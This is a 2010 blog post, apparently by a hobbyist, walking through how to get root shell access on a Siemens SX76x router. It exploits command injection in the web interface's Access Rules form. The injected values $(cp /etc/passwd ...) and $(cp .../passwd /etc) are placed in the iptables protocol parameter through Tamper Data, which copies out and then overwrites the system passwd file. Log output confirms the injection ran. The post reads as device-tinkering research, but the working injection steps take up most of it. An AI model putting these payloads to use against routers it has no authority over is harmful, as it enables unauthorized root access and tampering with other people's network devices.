Tuesday, April 27, 2010, 15:55
I want my shell (still SX76x)
UPDATE1: The info below are dated it is easier to use the php script i made and attached to the post.
UPDATE2: Updated script so now it can be used to change administrator user to root, that way ones with pubkey locked administrator account can log in via ssh too.
Well enabling ssh on sx76x is a thing but one might prefer shell access instead of stupid management console listening on the other end like :
sx762 login: administrator Password: Trying to connect to SCM ... ... Connected to SCM Response: OK IGD.>
So what we can do ? Lets find another bug :)
First we share an USB stick with FTP access as we would do normally:
Of course need a pendrive plugged inside something like this happens:
00.00.0000 00:08:47 War <EVENT> kernel: Got MODEM_READY_MSG 00.00.0000 00:09:14 War <EVENT> kernel: Vendor: Kingston Model: DataTraveler2.0 Rev: 1.00 00.00.0000 00:09:14 War <EVENT> kernel: Type: Direct-Access ANSI SCSI revision: 02 00.00.0000 00:09:14 War <EVENT> kernel: Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0 00.00.0000 00:09:14 War <EVENT> kernel: SCSI device sda: 1956735 512-byte hdwr sectors (1002 MB) 00.00.0000 00:09:14 War <EVENT> kernel: sda: Write Protect is off 00.00.0000 00:09:14 War <EVENT> kernel: /dev/scsi/host0/bus0/target0/lun0:kernel: p1 00.00.0000 00:09:14 Err <EVENT> scm: 073-00-00 CM_USB_MOUNT: -> MOUNTING: >mount /dev/scsi/host0/bus0/target0/lun0/part1 /mnt/usbmsd/share/usb_1 vfat<
Lets test it:
Now that we see our pendrive via FTP lets add some Access Rules with tamper data of course:
Lets write to command something like into comment box (it will just help us urlencode stuff for tamper data) $(cp /etc/passwd /mnt/usbmsd/share/usb_1) and add that port with Tamper Data addon active, and lets copy over the name parameter what we have the command inside to protocol as it is looking much nicer there.
And send it away it gonna result something like this :
And a lonely error message in logs what tells us what we wanted failed:
00.00.0000 00:34:13 Err <EVENT> scm: 077-00-00 cmd[/bin/iptables -A Access -p $(cp /etc/passwd /mnt/usbmsd/share/usb_1) -j ACCEPT] failed with err[512]
Lets delete the Access rule we just made as it fails, and take a look at the pendrive via FTP:
Oh a new file called passwd lets edit it up a bit as /bin/mgmt is not a shell but /bin/sh is
 |
 |
And save the changes to our pendrive and try to create another access rule what might not fail this time like $(cp /mnt/usbmsd/share/usb_1/passwd /etc)
click add and we tamper it like last time:
And sad but the result will be something similar in logs:
00.00.0000 00:57:53 Err <EVENT> scm: 077-00-00 cmd[/bin/iptables -A Access -p $(cp /mnt/usbmsd/share/usb_1/passwd /etc) -j ACCEPT] failed with err[512]
So lets just delete that rule too, and try to log in via ssh
sx762 login: administrator Password: BusyBox v1.00 (2009.02.26-10:13+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. ~ #
Something did the magic at least now we have shell (until next restart unless make an user script to overwrite passwd file on each boot)